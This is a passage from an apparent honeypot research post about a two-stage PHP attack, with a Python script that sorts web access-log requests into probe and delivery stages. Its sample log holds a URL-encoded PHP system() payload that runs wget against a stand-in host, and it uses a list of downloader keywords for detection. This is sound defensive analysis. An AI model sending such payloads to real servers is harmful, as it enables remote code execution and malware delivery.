If you want to read the full data of my analysis, I would like to point you to the PDF on this attack.
But now to the other side of the story. My other/old honeypot did not have the feature of simulating successful attacks. That means it always responded in one of two ways:
- random data (like Artillery)
- an unsuccessful "40x" response (like Beeswarm and Apache)
Two stage compromise attacks

The attack described in the other post had two stages:
- a PHP-related encoded URL
- a PHP system() call to download and execute the malicious code
Stage 1 is only used to find a target that is vulnerable. In other words, the attacker does not spread the code into the wild, or into the hands of a researcher, without being sure it would work.
A good indicator for this theory is that, although the malware was written in 2008 and repacked in 2014, many anti-virus solutions do not detect it, and even VirusTotal does not report the download site as malicious.
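As an added example (not code from the original post or the honeypots named above), the following Python script correlates the two stages per source address in Apache-style access logs: a stage-1 probe is a request to a .php resource whose URL-decoded query contains a PHP open tag, and stage 2 is a decoded request that calls system() together with a downloader. The log lines, the source addresses and the download host example.invalid are constructed sample data; a source that appears with both stages is one that received a "successful"-looking answer to its probe, which is exactly what a 40x-only honeypot never shows.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines (sample data, not taken from the post).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2014:08:01:02 +0000] "GET /index.php?q=%3C%3Fphp+echo+%27probe%27%3B HTTP/1.1" 404 210 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2014:08:05:11 +0000] "GET /index.php?q=%3C%3Fphp+echo+%27probe%27%3B HTTP/1.1" 200 5 "-" "Mozilla/4.0"
198.51.100.7 - - [10/Mar/2014:08:05:12 +0000] "GET /index.php?q=%3C%3Fphp+system%28%22wget+http%3A%2F%2Fexample.invalid%2Fx%22%29%3B HTTP/1.1" 200 0 "-" "Mozilla/4.0"
192.0.2.9 - - [10/Mar/2014:08:09:40 +0000] "GET /about.html HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: source IP, method, request path, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
DOWNLOADERS = ("wget", "curl", "fetch")

def classify(path):
    """Return 'stage2', 'stage1' or None for one raw (still encoded) request path."""
    if ".php" not in path.split("?", 1)[0]:
        return None
    decoded = unquote_plus(path).lower()  # undo %xx and '+' encoding
    if "<?php" not in decoded:
        return None
    if "system(" in decoded and any(tool in decoded for tool in DOWNLOADERS):
        return "stage2"
    return "stage1"

def correlate(log_text):
    """Map each source IP to the stages it sent and the status codes it received."""
    seen = defaultdict(lambda: {"stages": set(), "statuses": set()})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        stage = classify(m["path"])
        if stage:
            seen[m["ip"]]["stages"].add(stage)
            seen[m["ip"]]["statuses"].add(int(m["status"]))
    return dict(seen)

def escalated_sources(log_text):
    """Sources that went on from the stage-1 probe to stage-2 delivery."""
    return sorted(ip for ip, info in correlate(log_text).items()
                  if {"stage1", "stage2"} <= info["stages"])

if __name__ == "__main__":
    for ip, info in correlate(SAMPLE_LOG).items():
        print(ip, sorted(info["stages"]), sorted(info["statuses"]))
    print("escalated:", escalated_sources(SAMPLE_LOG))
```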